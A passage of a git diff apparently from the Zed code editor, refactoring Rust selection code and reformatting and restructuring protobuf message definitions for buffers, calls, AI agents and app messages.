buffer_snapshot.anchor_before(position); + let Some(anchor) = multibuffer_snapshot.anchor_in_buffer(text_anchor) + else { + return; + }; editor.change_selections( SelectionEffects::scroll(Autoscroll::center()), window, cx, - |s| s.select_ranges([position..position]), + |s| s.select_ranges([anchor..anchor]), ); }); })?; @@ -477,7 +487,7 @@ mod tests { cx.update(|cx| { let store = SettingsStore::test(cx); cx.set_global(store); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); release_channel::init(semver::Version::new(0, 0, 0), cx); editor::init(cx); }); diff --git a/crates/prompt_store/src/prompts.rs b/crates/prompt_store/src/prompts.rs index 6a845bb8dd394f8a1ff26a8a0e130156a2a158bd..b0052947c44445be37f99e99cf723d5aa53c5008 100644 --- a/crates/prompt_store/src/prompts.rs +++ b/crates/prompt_store/src/prompts.rs @@ -26,9 +26,9 @@ pub const RULES_FILE_NAMES: &[&str] = &[ ".windsurfrules", ".clinerules", ".github/copilot-instructions.md", - "CLAUDE.md", "AGENT.md", "AGENTS.md", + "CLAUDE.md", "GEMINI.md", ]; diff --git a/crates/proto/Cargo.toml b/crates/proto/Cargo.toml index 5b5b8b985cbc102cc451050403cff2e3699f612f..dfa4166f2077aea60aa87084af4918c92882f2df 100644 --- a/crates/proto/Cargo.toml +++ b/crates/proto/Cargo.toml @@ -7,7 +7,7 @@ publish.workspace = true license = "GPL-3.0-or-later" [features] -test-support = ["collections/test-support"] +test-support = [] [lints] workspace = true @@ -25,5 +25,3 @@ serde.workspace = true prost-build.workspace = true [dev-dependencies] -collections = { workspace = true, features = ["test-support"] } -typed-path = "0.11" diff --git a/crates/proto/proto/ai.proto b/crates/proto/proto/ai.proto index b2a8a371c4422e80ad5edd677f2b75288f69ebd4..20c87d830a68c38c3682ff05d0fb5416099b17ff 100644 --- a/crates/proto/proto/ai.proto +++ b/crates/proto/proto/ai.proto @@ -1,249 +1,87 @@ syntax = "proto3"; package zed.messages; -import "buffer.proto"; import "task.proto"; -message Context { - 
repeated ContextOperation operations = 1; -} - -message ContextMetadata { - string context_id = 1; - optional string summary = 2; -} - -message ContextMessageStatus { - oneof variant { - Done done = 1; - Pending pending = 2; - Error error = 3; - Canceled canceled = 4; - } - - message Done {} - - message Pending {} - - message Error { - string message = 1; - } - - message Canceled {} -} - -message ContextMessage { - LamportTimestamp id = 1; - Anchor start = 2; - LanguageModelRole role = 3; - ContextMessageStatus status = 4; -} - -message SlashCommandOutputSection { - AnchorRange range = 1; - string icon_name = 2; - string label = 3; - optional string metadata = 4; -} - -message ThoughtProcessOutputSection { - AnchorRange range = 1; -} - -message ContextOperation { - oneof variant { - InsertMessage insert_message = 1; - UpdateMessage update_message = 2; - UpdateSummary update_summary = 3; - BufferOperation buffer_operation = 5; - SlashCommandStarted slash_command_started = 6; - SlashCommandOutputSectionAdded slash_command_output_section_added = 7; - SlashCommandCompleted slash_command_completed = 8; - ThoughtProcessOutputSectionAdded thought_process_output_section_added = 9; - } - - reserved 4; - - message InsertMessage { - ContextMessage message = 1; - repeated VectorClockEntry version = 2; - } - - message UpdateMessage { - LamportTimestamp message_id = 1; - LanguageModelRole role = 2; - ContextMessageStatus status = 3; - LamportTimestamp timestamp = 4; - repeated VectorClockEntry version = 5; - } - - message UpdateSummary { - string summary = 1; - bool done = 2; - LamportTimestamp timestamp = 3; - repeated VectorClockEntry version = 4; - } - - message SlashCommandStarted { - LamportTimestamp id = 1; - AnchorRange output_range = 2; - string name = 3; - repeated VectorClockEntry version = 4; - } - - message SlashCommandOutputSectionAdded { - LamportTimestamp timestamp = 1; - SlashCommandOutputSection section = 2; - repeated VectorClockEntry version = 3; - } - - 
message SlashCommandCompleted { - LamportTimestamp id = 1; - LamportTimestamp timestamp = 3; - optional string error_message = 4; - repeated VectorClockEntry version = 5; - } - - message ThoughtProcessOutputSectionAdded { - LamportTimestamp timestamp = 1; - ThoughtProcessOutputSection section = 2; - repeated VectorClockEntry version = 3; - } - - message BufferOperation { - Operation operation = 1; - } -} - -message AdvertiseContexts { - uint64 project_id = 1; - repeated ContextMetadata contexts = 2; -} - -message OpenContext { - uint64 project_id = 1; - string context_id = 2; -} - -message OpenContextResponse { - Context context = 1; -} - -message CreateContext { - uint64 project_id = 1; -} - -message CreateContextResponse { - string context_id = 1; - Context context = 2; -} - -message UpdateContext { - uint64 project_id = 1; - string context_id = 2; - ContextOperation operation = 3; -} - -message ContextVersion { - string context_id = 1; - repeated VectorClockEntry context_version = 2; - repeated VectorClockEntry buffer_version = 3; -} - -message SynchronizeContexts { - uint64 project_id = 1; - repeated ContextVersion contexts = 2; -} - -message SynchronizeContextsResponse { - repeated ContextVersion contexts = 1; -} - -enum LanguageModelRole { - LanguageModelUser = 0; - LanguageModelAssistant = 1; - LanguageModelSystem = 2; - reserved 3; -} - message GetAgentServerCommand { - uint64 project_id = 1; - string name = 2; - optional string root_dir = 3; + uint64 project_id = 1; + string name = 2; + optional string root_dir = 3; } message GetContextServerCommand { - uint64 project_id = 1; - string server_id = 2; - optional string root_dir = 3; + uint64 project_id = 1; + string server_id = 2; + optional string root_dir = 3; } message ContextServerCommand { - string path = 1; - repeated string args = 2; - map env = 3; + string path = 1; + repeated string args = 2; + map env = 3; } message AgentServerCommand { - string path = 1; - repeated string args = 2; - map env = 3; 
- string root_dir = 4; + string path = 1; + repeated string args = 2; + map env = 3; + string root_dir = 4; - optional SpawnInTerminal login = 5; + optional SpawnInTerminal login = 5; } message ExternalAgentsUpdated { - uint64 project_id = 1; - repeated string names = 2; + uint64 project_id = 1; + repeated string names = 2; } message ExternalExtensionAgentTarget { - string archive = 1; - string cmd = 2; - repeated string args = 3; - optional string sha256 = 4; - map env = 5; + string archive = 1; + string cmd = 2; + repeated string args = 3; + optional string sha256 = 4; + map env = 5; } message ExternalExtensionAgent { - string name = 1; - optional string icon_path = 2; - string extension_id = 3; - map targets = 4; - map env = 5; + string name = 1; + optional string icon_path = 2; + string extension_id = 3; + map targets = 4; + map env = 5; + optional string version = 6; } message ExternalExtensionAgentsUpdated { - uint64 project_id = 1; - repeated ExternalExtensionAgent agents = 2; + uint64 project_id = 1; + repeated ExternalExtensionAgent agents = 2; } message ExternalAgentLoadingStatusUpdated { - uint64 project_id = 1; - string name = 2; - string status = 3; + uint64 project_id = 1; + string name = 2; + reserved 3; } message NewExternalAgentVersionAvailable { - uint64 project_id = 1; - string name = 2; - string version = 3; + uint64 project_id = 1; + string name = 2; + string version = 3; } message ShareAgentThread { - string session_id = 1; // Client-generated UUID (acp::SessionId) - string title = 2; - bytes thread_data = 3; + string session_id = 1; // Client-generated UUID (acp::SessionId) + string title = 2; + bytes thread_data = 3; } message GetSharedAgentThread { - string session_id = 1; // UUID string + string session_id = 1; // UUID string } message GetSharedAgentThreadResponse { - string title = 1; - bytes thread_data = 2; - string sharer_username = 3; - string created_at = 4; + string title = 1; + bytes thread_data = 2; + string sharer_username = 3; + 
string created_at = 4; } diff --git a/crates/proto/proto/app.proto b/crates/proto/proto/app.proto index 3aa3b23a889228903e14755e90eecfa168702f0c..2ced6a16d4441c11c124b73115a41a9e7008843a 100644 --- a/crates/proto/proto/app.proto +++ b/crates/proto/proto/app.proto @@ -4,60 +4,59 @@ package zed.messages; message ShutdownRemoteServer {} message Toast { - uint64 project_id = 1; - string notification_id = 2; - string message = 3; + uint64 project_id = 1; + string notification_id = 2; + string message = 3; } message HideToast { - uint64 project_id = 1; - string notification_id = 2; + uint64 project_id = 1; + string notification_id = 2; } message OpenServerSettings { - uint64 project_id = 1; + uint64 project_id = 1; } -message GetCrashFiles { -} +message GetCrashFiles {} message GetCrashFilesResponse { - repeated CrashReport crashes = 1; - reserved 2; // old panics + repeated CrashReport crashes = 1; + reserved 2; // old panics } message CrashReport { - reserved 1, 2; - string metadata = 3; - bytes minidump_contents = 4; + reserved 1, 2; + string metadata = 3; + bytes minidump_contents = 4; } message Extension { - string id = 1; - string version = 2; - bool dev = 3; + string id = 1; + string version = 2; + bool dev = 3; } message SyncExtensions { - repeated Extension extensions = 1; + repeated Extension extensions = 1; } message SyncExtensionsResponse { - string tmp_dir = 1; - repeated Extension missing_extensions = 2; + string tmp_dir = 1; + repeated Extension missing_extensions = 2; } message InstallExtension { - Extension extension = 1; - string tmp_dir = 2; + Extension extension = 1; + string tmp_dir = 2; } message AskPassRequest { - uint64 project_id = 1; - reserved 2; - uint64 repository_id = 3; - uint64 askpass_id = 4; - string prompt = 5; + uint64 project_id = 1; + reserved 2; + uint64 repository_id = 3; + uint64 askpass_id = 4; + string prompt = 5; } message AskPassResponse { @@ -65,29 +64,29 @@ message AskPassResponse { } message GetRemoteProfilingData { - 
uint64 project_id = 1; - bool foreground_only = 2; + uint64 project_id = 1; + bool foreground_only = 2; } message GetRemoteProfilingDataResponse { - repeated RemoteProfilingThread threads = 1; - uint64 now_nanos = 2; + repeated RemoteProfilingThread threads = 1; + uint64 now_nanos = 2; } message RemoteProfilingThread { - optional string thread_name = 1; - uint64 thread_id = 2; - repeated RemoteProfilingTiming timings = 3; + optional string thread_name = 1; + uint64 thread_id = 2; + repeated RemoteProfilingTiming timings = 3; } message RemoteProfilingTiming { - RemoteProfilingLocation location = 1; - uint64 start_nanos = 2; - uint64 duration_nanos = 3; + RemoteProfilingLocation location = 1; + uint64 start_nanos = 2; + uint64 duration_nanos = 3; } message RemoteProfilingLocation { - string file = 1; - uint32 line = 2; - uint32 column = 3; + string file = 1; + uint32 line = 2; + uint32 column = 3; } diff --git a/crates/proto/proto/buf.yaml b/crates/proto/proto/buf.yaml index 93e819b2f771c2f2e3c032e6c50c0d126758ac19..37436d8d80f9435729d54da4326000be05b085f7 100644 --- a/crates/proto/proto/buf.yaml +++ b/crates/proto/proto/buf.yaml @@ -2,3 +2,13 @@ version: v1 breaking: use: - WIRE +lint: + except: + # Since we use post_build instead of buf this doesn't matter + - PACKAGE_DIRECTORY_MATCH + # This is internal to Zed only so we don't enforce versions + - PACKAGE_VERSION_SUFFIX + # Style rules we don't enforce + - ENUM_VALUE_PREFIX + - ENUM_VALUE_UPPER_SNAKE_CASE + - ENUM_ZERO_VALUE_SUFFIX diff --git a/crates/proto/proto/buffer.proto b/crates/proto/proto/buffer.proto index 4cd83af2aab8a44feb9f9646ec85d343b8875f82..69bd844ee743ef9038beb25b98b9b31ffb130b2c 100644 --- a/crates/proto/proto/buffer.proto +++ b/crates/proto/proto/buffer.proto @@ -5,313 +5,317 @@ import "core.proto"; import "worktree.proto"; message OpenNewBuffer { - uint64 project_id = 1; + uint64 project_id = 1; } message OpenBufferResponse { - uint64 buffer_id = 1; + uint64 buffer_id = 1; } message 
CreateBufferForPeer { - uint64 project_id = 1; - PeerId peer_id = 2; - oneof variant { - BufferState state = 3; - BufferChunk chunk = 4; - } + uint64 project_id = 1; + PeerId peer_id = 2; + oneof variant { + BufferState state = 3; + BufferChunk chunk = 4; + } } message UpdateBuffer { - uint64 project_id = 1; - uint64 buffer_id = 2; - repeated Operation operations = 3; + uint64 project_id = 1; + uint64 buffer_id = 2; + repeated Operation operations = 3; } message OpenBufferByPath { - uint64 project_id = 1; - uint64 worktree_id = 2; - string path = 3; + uint64 project_id = 1; + uint64 worktree_id = 2; + string path = 3; } message OpenBufferById { - uint64 project_id = 1; - uint64 id = 2; + uint64 project_id = 1; + uint64 id = 2; } message UpdateBufferFile { - uint64 project_id = 1; - uint64 buffer_id = 2; - File file = 3; + uint64 project_id = 1; + uint64 buffer_id = 2; + File file = 3; } message SaveBuffer { - uint64 project_id = 1; - uint64 buffer_id = 2; - repeated VectorClockEntry version = 3; - optional ProjectPath new_path = 4; + uint64 project_id = 1; + uint64 buffer_id = 2; + repeated VectorClockEntry version = 3; + optional ProjectPath new_path = 4; } message CloseBuffer { - uint64 project_id = 1; - uint64 buffer_id = 2; + uint64 project_id = 1; + uint64 buffer_id = 2; } message BufferSaved { - uint64 project_id = 1; - uint64 buffer_id = 2; - repeated VectorClockEntry version = 3; - Timestamp mtime = 4; - reserved 5; + uint64 project_id = 1; + uint64 buffer_id = 2; + repeated VectorClockEntry version = 3; + Timestamp mtime = 4; + reserved 5; } message BufferReloaded { - uint64 project_id = 1; - uint64 buffer_id = 2; - repeated VectorClockEntry version = 3; - Timestamp mtime = 4; - reserved 5; - LineEnding line_ending = 6; + uint64 project_id = 1; + uint64 buffer_id = 2; + repeated VectorClockEntry version = 3; + Timestamp mtime = 4; + reserved 5; + LineEnding line_ending = 6; } message ReloadBuffers { - uint64 project_id = 1; - repeated uint64 buffer_ids = 
2; + uint64 project_id = 1; + repeated uint64 buffer_ids = 2; } message ReloadBuffersResponse { - ProjectTransaction transaction = 1; + ProjectTransaction transaction = 1; } message SynchronizeBuffers { - uint64 project_id = 1; - repeated BufferVersion buffers = 2; + uint64 project_id = 1; + repeated BufferVersion buffers = 2; } message SynchronizeBuffersResponse { - repeated BufferVersion buffers = 1; + repeated BufferVersion buffers = 1; } message BufferVersion { - uint64 id = 1; - repeated VectorClockEntry version = 2; + uint64 id = 1; + repeated VectorClockEntry version = 2; } message BufferState { - uint64 id = 1; - optional File file = 2; - string base_text = 3; - LineEnding line_ending = 5; - repeated VectorClockEntry saved_version = 6; - Timestamp saved_mtime = 8; + uint64 id = 1; + optional File file = 2; + string base_text = 3; + LineEnding line_ending = 5; + repeated VectorClockEntry saved_version = 6; + Timestamp saved_mtime = 8; - reserved 7; - reserved 4; + reserved 7; + reserved 4; } message BufferChunk { - uint64 buffer_id = 1; - repeated Operation operations = 2; - bool is_last = 3; + uint64 buffer_id = 1; + repeated Operation operations = 2; + bool is_last = 3; } enum LineEnding { - Unix = 0; - Windows = 1; + Unix = 0; + Windows = 1; } message VectorClockEntry { - uint32 replica_id = 1; - uint32 timestamp = 2; + uint32 replica_id = 1; + uint32 timestamp = 2; } message UndoMapEntry { - uint32 replica_id = 1; - uint32 local_timestamp = 2; - repeated UndoCount counts = 3; + uint32 replica_id = 1; + uint32 local_timestamp = 2; + repeated UndoCount counts = 3; } message UndoCount { - uint32 replica_id = 1; - uint32 lamport_timestamp = 2; - uint32 count = 3; + uint32 replica_id = 1; + uint32 lamport_timestamp = 2; + uint32 count = 3; } message Operation { - oneof variant { - Edit edit = 1; - Undo undo = 2; - UpdateSelections update_selections = 3; - UpdateDiagnostics update_diagnostics = 4; - UpdateCompletionTriggers update_completion_triggers = 5; - 
UpdateLineEnding update_line_ending = 6; - } - - message Edit { - uint32 replica_id = 1; - uint32 lamport_timestamp = 2; - repeated VectorClockEntry version = 3; - repeated Range ranges = 4; - repeated string new_text = 5; - } - - message Undo { - uint32 replica_id = 1; - uint32 lamport_timestamp = 2; - repeated VectorClockEntry version = 3; - repeated UndoCount counts = 4; - } - - message UpdateSelections { - uint32 replica_id = 1; - uint32 lamport_timestamp = 2; - repeated Selection selections = 3; - bool line_mode = 4; - CursorShape cursor_shape = 5; - } - - message UpdateCompletionTriggers { - uint32 replica_id = 1; - uint32 lamport_timestamp = 2; - repeated string triggers = 3; - uint64 language_server_id = 4; - } - - message UpdateLineEnding { - uint32 replica_id = 1; - uint32 lamport_timestamp = 2; - LineEnding line_ending = 3; - } + oneof variant { + Edit edit = 1; + Undo undo = 2; + UpdateSelections update_selections = 3; + UpdateDiagnostics update_diagnostics = 4; + UpdateCompletionTriggers update_completion_triggers = 5; + UpdateLineEnding update_line_ending = 6; + } + + message Edit { + uint32 replica_id = 1; + uint32 lamport_timestamp = 2; + repeated VectorClockEntry version = 3; + repeated Range ranges = 4; + repeated string new_text = 5; + } + + message Undo { + uint32 replica_id = 1; + uint32 lamport_timestamp = 2; + repeated VectorClockEntry version = 3; + repeated UndoCount counts = 4; + } + + message UpdateSelections { + uint32 replica_id = 1; + uint32 lamport_timestamp = 2; + repeated Selection selections = 3; + bool line_mode = 4; + CursorShape cursor_shape = 5; + } + + message UpdateCompletionTriggers { + uint32 replica_id = 1; + uint32 lamport_timestamp = 2; + repeated string triggers = 3; + uint64 language_server_id = 4; + } + + message UpdateLineEnding { + uint32 replica_id = 1; + uint32 lamport_timestamp = 2; + LineEnding line_ending = 3; + } } message ProjectTransaction { - repeated uint64 buffer_ids = 1; - repeated Transaction 
transactions = 2; + repeated uint64 buffer_ids = 1; + repeated Transaction transactions = 2; } message Transaction { - LamportTimestamp id = 1; - repeated LamportTimestamp edit_ids = 2; - repeated VectorClockEntry start = 3; + LamportTimestamp id = 1; + repeated LamportTimestamp edit_ids = 2; + repeated VectorClockEntry start = 3; } message LamportTimestamp { - uint32 replica_id = 1; - uint32 value = 2; + uint32 replica_id = 1; + uint32 value = 2; } message Range { - uint64 start = 1; - uint64 end = 2; + uint64 start = 1; + uint64 end = 2; } message Selection { - uint64 id = 1; - EditorAnchor start = 2; - EditorAnchor end = 3; - bool reversed = 4; + uint64 id = 1; + EditorAnchor start = 2; + EditorAnchor end = 3; + bool reversed = 4; } message EditorAnchor { - uint64 excerpt_id = 1; - Anchor anchor = 2; + optional uint64 excerpt_id = 1; + Anchor anchor = 2; +} + +message PathKey { + optional uint64 sort_prefix = 1; + string path = 2; } enum CursorShape { - CursorBar = 0; - CursorBlock = 1; - CursorUnderscore = 2; - CursorHollow = 3; + CursorBar = 0; + CursorBlock = 1; + CursorUnderscore = 2; + CursorHollow = 3; } message UpdateDiagnostics { - uint32 replica_id = 1; - uint32 lamport_timestamp = 2; - uint64 server_id = 3; - repeated Diagnostic diagnostics = 4; + uint32 replica_id = 1; + uint32 lamport_timestamp = 2; + uint64 server_id = 3; + repeated Diagnostic diagnostics = 4; } message Anchor { - uint32 replica_id = 1; - uint32 timestamp = 2; - uint64 offset = 3; - Bias bias = 4; - optional uint64 buffer_id = 5; + uint32 replica_id = 1; + uint32 timestamp = 2; + uint64 offset = 3; + Bias bias = 4; + optional uint64 buffer_id = 5; } message AnchorRange { - Anchor start = 1; - Anchor end = 2; + Anchor start = 1; + Anchor end = 2; } message Location { - uint64 buffer_id = 1; - Anchor start = 2; - Anchor end = 3; + uint64 buffer_id = 1; + Anchor start = 2; + Anchor end = 3; } enum Bias { - Left = 0; - Right = 1; + Left = 0; + Right = 1; } message Diagnostic { - Anchor 
start = 1; - Anchor end = 2; - optional string source = 3; - optional string registration_id = 17; - - enum SourceKind { - Pulled = 0; - Pushed = 1; - Other = 2; - } - - SourceKind source_kind = 16; - Severity severity = 4; - string message = 5; - optional string code = 6; - uint64 group_id = 7; - bool is_primary = 8; - - reserved 9; - - bool is_disk_based = 10; - bool is_unnecessary = 11; - bool underline = 15; - - enum Severity { - None = 0; - Error = 1; - Warning = 2; - Information = 3; - Hint = 4; - } - optional string data = 12; - optional string code_description = 13; - optional string markdown = 14; + Anchor start = 1; + Anchor end = 2; + optional string source = 3; + optional string registration_id = 17; + + enum SourceKind { + Pulled = 0; + Pushed = 1; + Other = 2; + } + + SourceKind source_kind = 16; + Severity severity = 4; + string message = 5; + optional string code = 6; + uint64 group_id = 7; + bool is_primary = 8; + + reserved 9; + + bool is_disk_based = 10; + bool is_unnecessary = 11; + bool underline = 15; + + enum Severity { + None = 0; + Error = 1; + Warning = 2; + Information = 3; + Hint = 4; + } + optional string data = 12; + optional string code_description = 13; + optional string markdown = 14; } message SearchQuery { - string query = 2; - bool regex = 3; - bool whole_word = 4; - bool case_sensitive = 5; - repeated string files_to_include = 10; - repeated string files_to_exclude = 11; - bool match_full_paths = 9; - bool include_ignored = 8; - string files_to_include_legacy = 6; - string files_to_exclude_legacy = 7; + string query = 2; + bool regex = 3; + bool whole_word = 4; + bool case_sensitive = 5; + repeated string files_to_include = 10; + repeated string files_to_exclude = 11; + bool match_full_paths = 9; + bool include_ignored = 8; + string files_to_include_legacy = 6; + string files_to_exclude_legacy = 7; } message FindSearchCandidates { - uint64 project_id = 1; - SearchQuery query = 2; - uint64 limit = 3; - uint64 handle = 4; + uint64 
project_id = 1; + SearchQuery query = 2; + uint64 limit = 3; + uint64 handle = 4; } - message FindSearchCandidatesDone {} message FindSearchCandidatesMatches { @@ -330,6 +334,6 @@ message FindSearchCandidatesChunk { } message FindSearchCandidatesCancelled { - uint64 project_id = 1; - uint64 handle = 2; + uint64 project_id = 1; + uint64 handle = 2; } diff --git a/crates/proto/proto/call.proto b/crates/proto/proto/call.proto index a7fe607bb5aaaff53518652186f46bcb6529e661..71351fb74c5834fe0b1650f22e851c21cd752466 100644 --- a/crates/proto/proto/call.proto +++ b/crates/proto/proto/call.proto @@ -1,424 +1,440 @@ syntax = "proto3"; package zed.messages; -import "core.proto"; -import "worktree.proto"; import "buffer.proto"; -import "lsp.proto"; import "channel.proto"; +import "core.proto"; import "git.proto"; +import "lsp.proto"; +import "worktree.proto"; message CreateRoom {} message CreateRoomResponse { - Room room = 1; - optional LiveKitConnectionInfo live_kit_connection_info = 2; + Room room = 1; + optional LiveKitConnectionInfo live_kit_connection_info = 2; } message JoinRoom { - uint64 id = 1; + uint64 id = 1; } message JoinRoomResponse { - Room room = 1; - optional uint64 channel_id = 2; - optional LiveKitConnectionInfo live_kit_connection_info = 3; + Room room = 1; + optional uint64 channel_id = 2; + optional LiveKitConnectionInfo live_kit_connection_info = 3; } message RejoinRoom { - uint64 id = 1; - repeated UpdateProject reshared_projects = 2; - repeated RejoinProject rejoined_projects = 3; + uint64 id = 1; + repeated UpdateProject reshared_projects = 2; + repeated RejoinProject rejoined_projects = 3; } message RejoinRemoteProjects { - repeated RejoinProject rejoined_projects = 1; + repeated RejoinProject rejoined_projects = 1; } message RejoinRemoteProjectsResponse { - repeated RejoinedProject rejoined_projects = 1; + repeated RejoinedProject rejoined_projects = 1; } message RejoinProject { - uint64 id = 1; - repeated RejoinWorktree worktrees = 2; - repeated 
RejoinRepository repositories = 3; + uint64 id = 1; + repeated RejoinWorktree worktrees = 2; + repeated RejoinRepository repositories = 3; } message RejoinWorktree { - uint64 id = 1; - uint64 scan_id = 2; + uint64 id = 1; + uint64 scan_id = 2; } message RejoinRepository { - uint64 id = 1; - uint64 scan_id = 2; + uint64 id = 1; + uint64 scan_id = 2; } message RejoinRoomResponse { - Room room = 1; - repeated ResharedProject reshared_projects = 2; - repeated RejoinedProject rejoined_projects = 3; + Room room = 1; + repeated ResharedProject reshared_projects = 2; + repeated RejoinedProject rejoined_projects = 3; } message ResharedProject { - uint64 id = 1; - repeated Collaborator collaborators = 2; + uint64 id = 1; + repeated Collaborator collaborators = 2; } message RejoinedProject { - uint64 id = 1; - repeated WorktreeMetadata worktrees = 2; - repeated Collaborator collaborators = 3; - repeated LanguageServer language_servers = 4; - repeated string language_server_capabilities = 5; + uint64 id = 1; + repeated WorktreeMetadata worktrees = 2; + repeated Collaborator collaborators = 3; + repeated LanguageServer language_servers = 4; + repeated string language_server_capabilities = 5; } message LeaveRoom {} message Room { - uint64 id = 1; - repeated Participant participants = 2; - repeated PendingParticipant pending_participants = 3; - repeated Follower followers = 4; - string livekit_room = 5; + uint64 id = 1; + repeated Participant participants = 2; + repeated PendingParticipant pending_participants = 3; + repeated Follower followers = 4; + string livekit_room = 5; } message Participant { - uint64 user_id = 1; - PeerId peer_id = 2; - repeated ParticipantProject projects = 3; - ParticipantLocation location = 4; - uint32 participant_index = 5; - ChannelRole role = 6; - reserved 7; + uint64 user_id = 1; + PeerId peer_id = 2; + repeated ParticipantProject projects = 3; + ParticipantLocation location = 4; + uint32 participant_index = 5; + ChannelRole role = 6; + reserved 7; 
} message PendingParticipant { - uint64 user_id = 1; - uint64 calling_user_id = 2; - optional uint64 initial_project_id = 3; + uint64 user_id = 1; + uint64 calling_user_id = 2; + optional uint64 initial_project_id = 3; } message ParticipantProject { - uint64 id = 1; - repeated string worktree_root_names = 2; + uint64 id = 1; + repeated string worktree_root_names = 2; } message Follower { - PeerId leader_id = 1; - PeerId follower_id = 2; - uint64 project_id = 3; + PeerId leader_id = 1; + PeerId follower_id = 2; + uint64 project_id = 3; } message ParticipantLocation { - oneof variant { - SharedProject shared_project = 1; - UnsharedProject unshared_project = 2; - External external = 3; - } + oneof variant { + SharedProject shared_project = 1; + UnsharedProject unshared_project = 2; + External external = 3; + } - message SharedProject { - uint64 id = 1; - } + message SharedProject { + uint64 id = 1; + } - message UnsharedProject {} + message UnsharedProject {} - message External {} + message External {} } message Call { - uint64 room_id = 1; - uint64 called_user_id = 2; - optional uint64 initial_project_id = 3; + uint64 room_id = 1; + uint64 called_user_id = 2; + optional uint64 initial_project_id = 3; } message IncomingCall { - uint64 room_id = 1; - uint64 calling_user_id = 2; - repeated uint64 participant_user_ids = 3; - optional ParticipantProject initial_project = 4; + uint64 room_id = 1; + uint64 calling_user_id = 2; + repeated uint64 participant_user_ids = 3; + optional ParticipantProject initial_project = 4; } message CallCanceled { - uint64 room_id = 1; + uint64 room_id = 1; } message CancelCall { - uint64 room_id = 1; - uint64 called_user_id = 2; + uint64 room_id = 1; + uint64 called_user_id = 2; } message DeclineCall { - uint64 room_id = 1; + uint64 room_id = 1; } message UpdateParticipantLocation { - uint64 room_id = 1; - ParticipantLocation location = 2; + uint64 room_id = 1; + ParticipantLocation location = 2; } message RoomUpdated { - Room room = 1; + 
Room room = 1; } message LiveKitConnectionInfo { - string server_url = 1; - string token = 2; - bool can_publish = 3; + string server_url = 1; + string token = 2; + bool can_publish = 3; } message ShareProject { - uint64 room_id = 1; - repeated WorktreeMetadata worktrees = 2; - reserved 3; - bool is_ssh_project = 4; - optional bool windows_paths = 5; + uint64 room_id = 1; + repeated WorktreeMetadata worktrees = 2; + reserved 3; + bool is_ssh_project = 4; + optional bool windows_paths = 5; + repeated string features = 6; } message ShareProjectResponse { - uint64 project_id = 1; + uint64 project_id = 1; } message UnshareProject { - uint64 project_id = 1; + uint64 project_id = 1; } message UpdateProject { - uint64 project_id = 1; - repeated WorktreeMetadata worktrees = 2; + uint64 project_id = 1; + repeated WorktreeMetadata worktrees = 2; } message JoinProject { - uint64 project_id = 1; - optional string committer_email = 2; - optional string committer_name = 3; + uint64 project_id = 1; + optional string committer_email = 2; + optional string committer_name = 3; + repeated string features = 4; } message JoinProjectResponse { - uint64 project_id = 5; - uint32 replica_id = 1; - repeated WorktreeMetadata worktrees = 2; - repeated Collaborator collaborators = 3; - repeated LanguageServer language_servers = 4; - repeated string language_server_capabilities = 8; - ChannelRole role = 6; - bool windows_paths = 9; - reserved 7; + uint64 project_id = 5; + uint32 replica_id = 1; + repeated WorktreeMetadata worktrees = 2; + repeated Collaborator collaborators = 3; + repeated LanguageServer language_servers = 4; + repeated string language_server_capabilities = 8; + ChannelRole role = 6; + bool windows_paths = 9; + repeated string features = 10; + reserved 7; } message LeaveProject { - uint64 project_id = 1; + uint64 project_id = 1; } message UpdateWorktree { - uint64 project_id = 1; - uint64 worktree_id = 2; - string root_name = 3; - repeated Entry updated_entries = 4; - repeated 
uint64 removed_entries = 5; - repeated RepositoryEntry updated_repositories = 6; // deprecated - repeated uint64 removed_repositories = 7; // deprecated - uint64 scan_id = 8; - bool is_last_update = 9; - string abs_path = 10; + uint64 project_id = 1; + uint64 worktree_id = 2; + string root_name = 3; + repeated Entry updated_entries = 4; + repeated uint64 removed_entries = 5; + repeated RepositoryEntry updated_repositories = 6; // deprecated + repeated uint64 removed_repositories = 7; // deprecated + uint64 scan_id = 8; + bool is_last_update = 9; + string abs_path = 10; + optional string root_repo_common_dir = 11; } // deprecated message RepositoryEntry { - uint64 repository_id = 1; - reserved 2; - repeated StatusEntry updated_statuses = 3; - repeated string removed_statuses = 4; - repeated string current_merge_conflicts = 5; - optional Branch branch_summary = 6; + uint64 repository_id = 1; + reserved 2; + repeated StatusEntry updated_statuses = 3; + repeated string removed_statuses = 4; + repeated string current_merge_conflicts = 5; + optional Branch branch_summary = 6; } message AddProjectCollaborator { - uint64 project_id = 1; - Collaborator collaborator = 2; + uint64 project_id = 1; + Collaborator collaborator = 2; } message UpdateProjectCollaborator { - uint64 project_id = 1; - PeerId old_peer_id = 2; - PeerId new_peer_id = 3; + uint64 project_id = 1; + PeerId old_peer_id = 2; + PeerId new_peer_id = 3; } message RemoveProjectCollaborator { - uint64 project_id = 1; - PeerId peer_id = 2; + uint64 project_id = 1; + PeerId peer_id = 2; } message GetUsers { - repeated uint64 user_ids = 1; + repeated uint64 user_ids = 1; } message FuzzySearchUsers { - string query = 1; + string query = 1; } message UsersResponse { - repeated User users = 1; + repeated User users = 1; } message RequestContact { - uint64 responder_id = 1; + uint64 responder_id = 1; } message RemoveContact { - uint64 user_id = 1; + uint64 user_id = 1; } message RespondToContactRequest { - uint64 
requester_id = 1; - ContactRequestResponse response = 2; + uint64 requester_id = 1; + ContactRequestResponse response = 2; } enum ContactRequestResponse { - Accept = 0; - Decline = 1; - Block = 2; - Dismiss = 3; + Accept = 0; + Decline = 1; + Block = 2; + Dismiss = 3; } message UpdateContacts { - repeated Contact contacts = 1; - repeated uint64 remove_contacts = 2; - repeated IncomingContactRequest incoming_requests = 3; - repeated uint64 remove_incoming_requests = 4; - repeated uint64 outgoing_requests = 5; - repeated uint64 remove_outgoing_requests = 6; + repeated Contact contacts = 1; + repeated uint64 remove_contacts = 2; + repeated IncomingContactRequest incoming_requests = 3; + repeated uint64 remove_incoming_requests = 4; + repeated uint64 outgoing_requests = 5; + repeated uint64 remove_outgoing_requests = 6; } message ShowContacts {} message IncomingContactRequest { - uint64 requester_id = 1; + uint64 requester_id = 1; } message Follow { - uint64 room_id = 1; - optional uint64 project_id = 2; - PeerId leader_id = 3; + uint64 room_id = 1; + optional uint64 project_id = 2; + PeerId leader_id = 3; } message FollowResponse { - View active_view = 3; - reserved 1; - repeated View views = 2; + View active_view = 3; + reserved 1; + repeated View views = 2; } message UpdateFollowers { - uint64 room_id = 1; - optional uint64 project_id = 2; - reserved 3; - oneof variant { - View create_view = 5; - UpdateActiveView update_active_view = 4; - 